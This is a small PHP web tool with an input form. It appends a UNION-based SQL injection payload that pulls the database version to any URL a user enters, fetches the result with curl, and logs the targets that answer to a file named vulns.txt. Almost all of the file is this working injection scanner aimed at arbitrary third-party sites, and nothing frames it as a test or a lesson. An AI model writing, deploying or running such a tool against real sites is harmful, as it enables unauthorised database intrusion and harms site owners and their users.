<form action="?inject" method="POST">
<b>Enter site:</b><br>
<input type="text" name="site"><br>
<input type="submit" value="Submit"><br>
<br>
</form>
<?php
$site = security($_POST['site']);
$inject = $_GET['inject'];
if(isset($inject)) {
if(!empty($site)){
$query = 'null union all select 1,version(),3,4,5,6,7--';
$siteq = $site.$query;
//$fields = array('input' => $vuln 'submit' => '');
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $siteq);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
//curl_setopt($ch, CURLOPT_USERAGENT, $browser); //
//curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
$result = curl_exec($ch);
if (!empty($result)) {
$fp = fopen('vulns.txt', 'w');
fwrite($fp, $site."\r\n");
fwrite($fp, $result."\r\n");
fwrite($fp, '=====================================================================================================================');
fclose($fp);
echo 'Echoed into the textdocument <a href="vulns.txt">vulns.txt</a>';
}
else {
echo 'No feedback from webserver';
}
}
}
function security($value) {
//$sec = mysqli_real_escape_string($value);
$sec2 = stripcslashes($value);
$sec3 = strip_tags($sec2);
$sec4 = htmlspecialchars($sec3);
$sec5 = htmlentities($sec4);
//$sec6 = preg_replace("[^A-Za-z0-9%].,?!", "", $sec5);
$sec7 = addslashes($sec5);
return $sec7;
}
?>